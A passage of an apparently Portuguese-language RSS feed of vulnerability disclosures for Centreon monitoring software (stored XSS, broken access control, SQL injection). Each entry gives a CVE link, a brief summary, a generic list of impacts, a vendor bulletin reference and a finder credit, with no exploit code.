&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12511-centreon-dsm-medium-severity-5361&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12513</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-12513/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-12513/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12513-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-12513: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de parâmetros de configuração do Host.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12513-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-12513: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12513&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de parâmetros de configuração do Host.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12513-centreon-web-medium-severity-5360&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12519</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-12519/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-12519/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12519-controle-de-acesso-quebrado&amp;#34;&amp;gt;CVE-2025-12519: Controle de Acesso Quebrado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Divulgação de informações sobre o endpoint da API de parâmetros de administração.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12519-controle-de-acesso-quebrado&amp;#34;&amp;gt;CVE-2025-12519: Controle de Acesso Quebrado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12519&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Divulgação de informações sobre o endpoint da API de parâmetros de administração.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12519-centreon-web-medium-severity-5359&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-13056</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-13056/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-13056/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-13056-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-13056: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Menus de ACL de Administração.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-13056-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-13056: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-13056&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração dos Menus de ACL de Administração.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-13056-centreon-web-medium-severity-5358&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-15026</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-15026/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-15026/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-15026-controle-de-acesso-quebrado&amp;#34;&amp;gt;CVE-2025-15026: Controle de Acesso Quebrado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade &amp;#34;Falta de autenticação para função crítica&amp;#34; no Centreon Infra Monitoring (módulo de importação Awie &amp;#34;centreon-awie&amp;#34;) permite o acesso a funcionalidades não devidamente restringidas pelas ACLs.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-15026-controle-de-acesso-quebrado&amp;#34;&amp;gt;CVE-2025-15026: Controle de Acesso Quebrado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15026&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade &amp;#34;Falta de autenticação para função crítica&amp;#34; no Centreon Infra Monitoring (módulo de importação Awie &amp;#34;centreon-awie&amp;#34;) permite o acesso a funcionalidades não devidamente restringidas pelas ACLs.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Vulnerabilidades de Controle de Acesso Quebrado podem ter consequências graves, incluindo:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a funcionalidades restritas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Escalonamento de privilégios para usuários de baixo nível;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Exposição de dados sensíveis e potencial comprometimento do sistema;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda de confidencialidade e integridade de registros educacionais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação da organização.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15026-centreon-awie-critical-severity-5357&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-15029</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-15029/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-15029/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-15029-injeção-sql&amp;#34;&amp;gt;CVE-2025-15029: Injeção SQL
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
